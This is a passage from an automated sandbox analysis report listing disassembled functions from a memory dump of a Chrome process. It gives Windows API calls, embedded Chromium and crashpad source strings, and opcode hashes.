                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: _strlen
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:268: assertion __s != nullptr failed: null pointer passed to non-null argument of char_traits<...>::length$..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr
                                                    • API String ID: 4218353326-2665691617
                                                    • Opcode ID: 92edfb2b44d1c267c1520ea297fe121bb5797594bc25909bf9a1d975d7b223c4
                                                    • Instruction ID: 41ee9de64b8182acc647d135a45e7ffe7511dae9b56aaa1d02e48cdb6dc10760
                                                    • Opcode Fuzzy Hash: 92edfb2b44d1c267c1520ea297fe121bb5797594bc25909bf9a1d975d7b223c4
                                                    • Instruction Fuzzy Hash: DC31ECF1E0031C5FDB24DB64EC81BAA77B5AB84318F0494E9E51D77382E6309E85CBA5
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32 ref: 00D6E393
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: ..\..\third_party\crashpad\crashpad\client\crash_report_database_win.cc$: not a directory$GetFileAttributes
                                                    • API String ID: 3188754299-1182343664
                                                    • Opcode ID: ea962536e897991660ae1b2f5acf389e6f0cd1b579a5d7d127fbe2f65f045f85
                                                    • Instruction ID: 6e15b082533efc1dcb72da19f6a18a33ee2d9ce9fd26332a3254fd39ce8b9f2b
                                                    • Opcode Fuzzy Hash: ea962536e897991660ae1b2f5acf389e6f0cd1b579a5d7d127fbe2f65f045f85
                                                    • Instruction Fuzzy Hash: D121F5B4B4035827EA1076656C4BFAE37599F81705F081474FA09BB2C3EAB5A9888662
                                                    APIs
                                                    • GetFileSizeEx.KERNEL32(00000000,?,00000000,00000000), ref: 00D32AD4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: FileSize
                                                    • String ID: ..\..\base\files\file_win.cc$GetLength$ScopedBlockingCall
                                                    • API String ID: 3433856609-1252741873
                                                    • Opcode ID: 5163468e8511f77d2d2b93129a8c4d66705f6129798d9ffe06bd22b51e413400
                                                    • Instruction ID: a83e7cf2bdf0841751312ac7da1d18b377aa4aa224959f95c1ad12acd141c8cc
                                                    • Opcode Fuzzy Hash: 5163468e8511f77d2d2b93129a8c4d66705f6129798d9ffe06bd22b51e413400
                                                    • Instruction Fuzzy Hash: E121D8B1A143549FD7009F19DC8296BB7E4EFC9750F14462AF8C5D7241EBB0990987A2
                                                    APIs
                                                    • UnmapViewOfFile.KERNEL32(?,00000000,?,?,00000001,?,00D325CE,?,?,?,?,?,?,?,?,00D324EF), ref: 00D42A22
                                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,00000001,?,00D325CE,?,?,?,?,?,?,?,?,00D324EF), ref: 00D42A86
                                                    • GetProcAddress.KERNEL32(00000000,GetHandleVerifier), ref: 00D42A92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AddressFileHandleModuleProcUnmapView
                                                    • String ID: GetHandleVerifier
                                                    • API String ID: 3224599007-1090674830
                                                    • Opcode ID: 44e41cfce4a682db9377f7782dbb0152bd68cbc87bc3e16740a316ecf037b74e
                                                    • Instruction ID: 38f19ab5dc6bfec466b868eb6b921b594c20b4014b584d8a5701abebc5c83068
                                                    • Opcode Fuzzy Hash: 44e41cfce4a682db9377f7782dbb0152bd68cbc87bc3e16740a316ecf037b74e
                                                    • Instruction Fuzzy Hash: 291193702003409FDB34AB26DC4A73A7BE5FB48301F580929F546E72A1DB71E805CB71
                                                    APIs
                                                    • LockFileEx.KERNEL32(?,850CC483,00000000,-00000001,-00000001,?), ref: 00D758BF
                                                    • GetLastError.KERNEL32 ref: 00D758DF
                                                    Strings
                                                    • ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc, xrefs: 00D75912
                                                    • LockFileEx, xrefs: 00D75924
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorFileLastLock
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\file\file_io_win.cc$LockFileEx
                                                    • API String ID: 1811722133-445818742
                                                    • Opcode ID: 0614b67fbb4cd0cd151fabb7269c57fea974694feb0a21bbe0b846df2ef14640
                                                    • Instruction ID: c7a36ba5da3b6c7634d9840a86f54d8211e26427300bde297b4e797606cb7d99
                                                    • Opcode Fuzzy Hash: 0614b67fbb4cd0cd151fabb7269c57fea974694feb0a21bbe0b846df2ef14640
                                                    • Instruction Fuzzy Hash: EA113830E0036867D7349B62AC45FBB777DEBC5700F04819AF8097B285EA745D88C7A2
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNEL32(?,00000000,00000000), ref: 00D4172F
                                                    Strings
                                                    • SetCurrentDirectoryW, xrefs: 00D416FC
                                                    • ..\..\base\files\file_util_win.cc, xrefs: 00D416F7
                                                    • ScopedBlockingCall, xrefs: 00D41765
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: ..\..\base\files\file_util_win.cc$ScopedBlockingCall$SetCurrentDirectoryW
                                                    • API String ID: 1611563598-623993952
                                                    • Opcode ID: 951a7d850f4c2bbac0f021999a47352056103bc1c85eb36f8a9b940f3894f1dd
                                                    • Instruction ID: 7604f48d892eab07210dae69ec89917be3a00048d90f8be8c29946bfe88a807c
                                                    • Opcode Fuzzy Hash: 951a7d850f4c2bbac0f021999a47352056103bc1c85eb36f8a9b940f3894f1dd
                                                    • Instruction Fuzzy Hash: DD113BB16003849FD7109F25DC4157BF7E8EFC5750F044A2EF8D5A7241E7B0A54987A2
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(00E79899,00000000,00000000), ref: 00D8283F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID: ..\..\base\files\file_util_win.cc$PathExists$ScopedBlockingCall
                                                    • API String ID: 3188754299-3474313534
                                                    APIs
                                                    • LoadLibraryW.KERNEL32(bcryptprimitives.dll,00000008), ref: 00DDDF1B
                                                    • GetProcAddress.KERNEL32(00000000,ProcessPrng), ref: 00DDDF2B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: ProcessPrng$bcryptprimitives.dll
                                                    • API String ID: 2574300362-2667675608
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF4540,?,00000000,?,00DBDF3E,?,00000000,?,00000000,?,-00000048,?), ref: 00DBE24D
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF4540,?,00000000,?,00DBDF3E,?,00000000,?,00000000,?,-00000048,?), ref: 00DBE2A4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: @E$bitset set argument out of range
                                                    • API String ID: 17069307-1644405516
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(00EF4540,?,?,00DBA709,00000002,?,?,?), ref: 00DBB00C
                                                    • ReleaseSRWLockExclusive.KERNEL32(00EF4540,?,00DBA709,00000002,?,?,?), ref: 00DBB039
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$AcquireRelease
                                                    • String ID: @E$bitset reset argument out of range
                                                    • API String ID: 17069307-1683922312
                                                    APIs
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?,00000000), ref: 00E0D722
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00E0D73F
                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 00E0D74D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ExclusiveLock$Acquire$Release
                                                    • String ID: T
                                                    • API String ID: 1678258262-2757253332
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00E50328,00000000,00000001,?,?,?,?,00E501E6,00000002,FlsGetValue,00EC7188,00EC7190), ref: 00E50299
                                                    • GetLastError.KERNEL32(?,00E50328,00000000,00000001,?,?,?,?,00E501E6,00000002,FlsGetValue,00EC7188,00EC7190,00000000,?,00E41734), ref: 00E502A3
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,00E41734,?,00E54421), ref: 00E502CB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLast
                                                    • String ID: api-ms-
                                                    • API String ID: 3177248105-2084034818
                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32(ECFE467E,00000000,00000000,?), ref: 00E3D75A
                                                      • Part of subcall function 00E4A071: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E43434,?,00000000,-00000008), ref: 00E4A0D2
                                                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00E3D9AC
                                                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00E3D9F2
                                                    • GetLastError.KERNEL32 ref: 00E3DA95
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                    • String ID:
                                                    • API String ID: 2112829910-0
                                                    APIs
                                                    • ResetEvent.KERNEL32(?), ref: 00D4342B
                                                    • ResetEvent.KERNEL32(?,00000001), ref: 00D434AF
                                                    • TryAcquireSRWLockExclusive.KERNEL32(?), ref: 00D434B9
                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 00D434FB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: EventExclusiveLockReset$AcquireRelease
                                                    • String ID:
                                                    • API String ID: 1579669990-0
                                                    APIs
                                                    Strings
                                                    • create_thread_last_error, xrefs: 00D4AB2C
                                                    • ..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr, xrefs: 00D4AB01
                                                    • ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type, xrefs: 00D4AAFA
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\third_party\libc++\src\include\string_view:318: assertion __len <= static_cast<size_type>(numeric_limits<difference_type>::max()) failed: string_view::string_view(_CharT *, size_t): length does not fit in difference_type$..\..\third_party\libc++\src\include\string_view:320: assertion __len == 0 || __s != nullptr failed: string_view::string_view(_CharT *, size_t): received nullptr$create_thread_last_error
                                                    • API String ID: 1452528299-2002432178
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(00000000), ref: 00DF35FE
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF363B
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF365E
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF36C2
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$CounterPerformanceQuery
                                                    • String ID:
                                                    • API String ID: 374826692-0
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00D47F22), ref: 00D48367
                                                    Strings
                                                    • Free, xrefs: 00D483C0
                                                    • CloseHandle, xrefs: 00D483DD
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc, xrefs: 00D483BB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    • Associated: 00000003.00000002.1758964650.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759260928.0000000000EC2000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759326127.0000000000EEF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759380984.0000000000EF0000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EF2000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759405233.0000000000EFF000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759519579.0000000000F06000.00000020.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000003.00000002.1759543577.0000000000F07000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                    • API String ID: 2962429428-1704384866
                                                    • Opcode ID: 671e1658aaf3a80fb3b9d72a21c17bc67e3cb3f9085489e341258c7f5d78f4b3
                                                    • Instruction ID: a57166b83f206fe078978d13238bb24165fe30e41fee9c4b7b464bf1e0a476f0
                                                    • Opcode Fuzzy Hash: 671e1658aaf3a80fb3b9d72a21c17bc67e3cb3f9085489e341258c7f5d78f4b3
                                                    • Instruction Fuzzy Hash: 542126B0A003445BDB20AF349C4DA6F77E4AF44754F084E1CE596AB2D2EB70E90997B1
                                                    APIs
                                                    • CloseHandle.KERNEL32(?,?,?,?,00000004,?,?,?,?,.pma,00000004,?,?,00E7992D,?,00E7992D), ref: 00D7AD8A
                                                    Strings
                                                    • ~Semaphore, xrefs: 00D7AE01
                                                    • ..\..\third_party\crashpad\crashpad\util\synchronization\semaphore_win.cc, xrefs: 00D7ADFC
                                                    • ..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at, xrefs: 00D7AE2B
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\synchronization\semaphore_win.cc$..\..\third_party\libc++\src\include\__memory\construct_at.h:66: assertion __loc != nullptr failed: null pointer given to destroy_at$~Semaphore
                                                    • API String ID: 2962429428-2974306023
                                                    • Opcode ID: d46e896e97ce6ec69b550db45998ced3fff00b36f512acb43c818f10f3c22d0a
                                                    • Instruction ID: d81fe68563ff1fd8f4da5109e1f471eab0ff5c2e3eb4ee85fb755f4672ec9892
                                                    • Opcode Fuzzy Hash: d46e896e97ce6ec69b550db45998ced3fff00b36f512acb43c818f10f3c22d0a
                                                    • Instruction Fuzzy Hash: 8F2107B16002049FDB20AB64DC45A6E77E8AF85305B58942DF54B7BA82F731EC058762
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b9ac7636924dff855ee81e46829cf2cf9e43d3b98a03b9d787c3c8f3d5b4fb4e
                                                    • Instruction ID: f25c11d52af882876194272b4e00a773a2e5ab9bf7d33c90428e8cd6def60343
                                                    • Opcode Fuzzy Hash: b9ac7636924dff855ee81e46829cf2cf9e43d3b98a03b9d787c3c8f3d5b4fb4e
                                                    • Instruction Fuzzy Hash: 00218331600205AFDB20AF61DD8986AFBAAAF11368F1D6535F495B7150DB30EC90C762
                                                    APIs
                                                    • TlsGetValue.KERNEL32(00000000), ref: 00D4A142
                                                    • TlsSetValue.KERNEL32(00000000,?), ref: 00D4A16F
                                                    • TlsSetValue.KERNEL32(00000000,00000000), ref: 00D4A198
                                                    • TlsAlloc.KERNEL32 ref: 00D4A1B5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Value$Alloc
                                                    • String ID:
                                                    • API String ID: 3180153967-0
                                                    • Opcode ID: 76382621da67f0fbaa3f799ca907bd670c18c3067c58736e43a6db38e53d1eeb
                                                    • Instruction ID: 2150e4a357347c14da116bbf2c0b1888f57f519794cd8dcbfd2f854b46fd2a37
                                                    • Opcode Fuzzy Hash: 76382621da67f0fbaa3f799ca907bd670c18c3067c58736e43a6db38e53d1eeb
                                                    • Instruction Fuzzy Hash: A711C8B1A0112C5FD710E768AC85ABA73ACEF44315F084539FA55FB151EB306E0987E2
                                                    APIs
                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00D54200,?,?), ref: 00D542F0
                                                    • GetExitCodeProcess.KERNEL32(00000000,FFFFFFFF), ref: 00D5430E
                                                    • GetCurrentProcess.KERNEL32(?,00D54200,?,?), ref: 00D5433B
                                                    • GetCurrentProcess.KERNEL32 ref: 00D54351
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: Process$Current$CodeExitMultipleObjectsWait
                                                    • String ID:
                                                    • API String ID: 3026435989-0
                                                    • Opcode ID: 397aaedf89cdc4bc5f78ec5bb86f2a58c2aad13664b9f76c77da2db570762983
                                                    • Instruction ID: f1b86cb5cfe526bfb9f0194a3717d5a3e675020a9bbf258bb6d5333057ea991b
                                                    • Opcode Fuzzy Hash: 397aaedf89cdc4bc5f78ec5bb86f2a58c2aad13664b9f76c77da2db570762983
                                                    • Instruction Fuzzy Hash: EE11B6706442089FEB149F69D849AA97BA4EF44315F18412CFC69DB291E770E889C762
                                                    APIs
                                                    • GetLastError.KERNEL32(?,?,?,?,?,00000000,?,00D99D7B,?,00E04967), ref: 00E7642B
                                                    Strings
                                                    • ..\..\base\synchronization\waitable_event_win.cc, xrefs: 00E7645D
                                                    • gI, xrefs: 00E76492
                                                    • ReportInvalidWaitableEventResult, xrefs: 00E76462
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast
                                                    • String ID: ..\..\base\synchronization\waitable_event_win.cc$ReportInvalidWaitableEventResult$gI
                                                    • API String ID: 1452528299-816916075
                                                    • Opcode ID: f63f4e4bce1247e081f4199356f96a7abca92b7201ac5eb51c0c2cb9b3376550
                                                    • Instruction ID: b61e212e0729aa4db02a9d8a4f8f701a7ddd85991ba540bd140f93c20d0cd26e
                                                    • Opcode Fuzzy Hash: f63f4e4bce1247e081f4199356f96a7abca92b7201ac5eb51c0c2cb9b3376550
                                                    • Instruction Fuzzy Hash: 0401A7B18047459BD701EF20AC0644FB7A0EF95318F44092DF88A37242E775A619C7E7
                                                    APIs
                                                    • CloseHandle.KERNEL32(00D485FC,?,00000000,00000000,?,00D485FC,00000000), ref: 00D9BC77
                                                    Strings
                                                    • Free, xrefs: 00D9BC9C
                                                    • CloseHandle, xrefs: 00D9BCB9
                                                    • ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc, xrefs: 00D9BC97
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1758994203.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_d30000_chrome.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID: ..\..\third_party\crashpad\crashpad\util\win\scoped_handle.cc$CloseHandle$Free
                                                    • API String ID: 2962429428-1704384866
                                                    • Opcode ID: 4b052425bbf8b6a61dd0db6f1d8752d59b30e29df5bfb8f8071ae6bb632dea89
                                                    • Instruction ID: 62aa345f244bd4ded118409d5846a0577ab728793a76533905077524f83eb386
                                                    • Opcode Fuzzy Hash: 4b052425bbf8b6a61dd0db6f1d8752d59b30e29df5bfb8f8071ae6bb632dea89
                                                    • Instruction Fuzzy Hash: A7F06271F00258678B047BB6AC1A8BE7768DF85B11B49501DF94A7B282EA74660486F1
                                                    APIs
                                                    • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000), ref: 00E52132
                                                    • GetLastError.KERNEL32(?,00E4C366,00000000,00000001,?,?,?,00E3DAE9,?,00000000,00000000,?,?,?,00E3D42F,?), ref: 00E5213E
